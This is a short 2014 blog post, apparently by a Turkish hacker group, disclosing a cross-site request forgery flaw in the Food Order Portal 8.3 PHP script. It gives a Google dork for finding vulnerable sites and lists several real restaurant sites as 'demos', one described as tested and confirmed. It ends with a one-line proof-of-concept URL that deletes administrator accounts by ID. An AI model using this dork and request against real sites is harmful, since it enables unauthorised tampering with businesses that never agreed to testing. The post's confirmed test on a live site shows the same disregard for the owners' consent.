11 Eylül 2014 Perşembe
Food Order Portal 8.3 - (CSRF) Remote Admin Delete PoC
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact(onlymail) : knockout@e-mail.com.tr
[~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com
############################################################
Turkey Security Group
'h4x0re SECURITY'
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Food Order Portal
|~Affected Version : 8.3
|~Official Web and referance's : http://www.tourismscripts.com/scripts/scripts/food-order-portal-multi-restaurant-lingual-php-script.html
|~RISK : Medium
|~Google Keyword/Dork : inurl:login_restaurant.php | are example
|~Tested On : Kali Linux \ Tested Browser: Mozilla Firefox \ Arora
####################INFO################################
without logging in to the admin panel it is possible to delete administrator..
########################################################
########################################################
Demos ;
http://click4foods.co.uk <=== Tested and panel was checked. CSRF was confirmed
( From the official site of reference are shown )
http://www.saveonmeals.com
http://pizzatakeway.it/
http://myfood24.it/
http://www.foodrunner.ru/
..
..
=============================================================
CSRF PoC:
http://[VICTIM]/admin/admin_user_delete.php?admin_id=[ADMIN ID] (Default: 1,2)
Administrator Deleted.
=============================================================
Kaydol:
Kayıt Yorumları (Atom)
Hiç yorum yok:
Yorum Gönder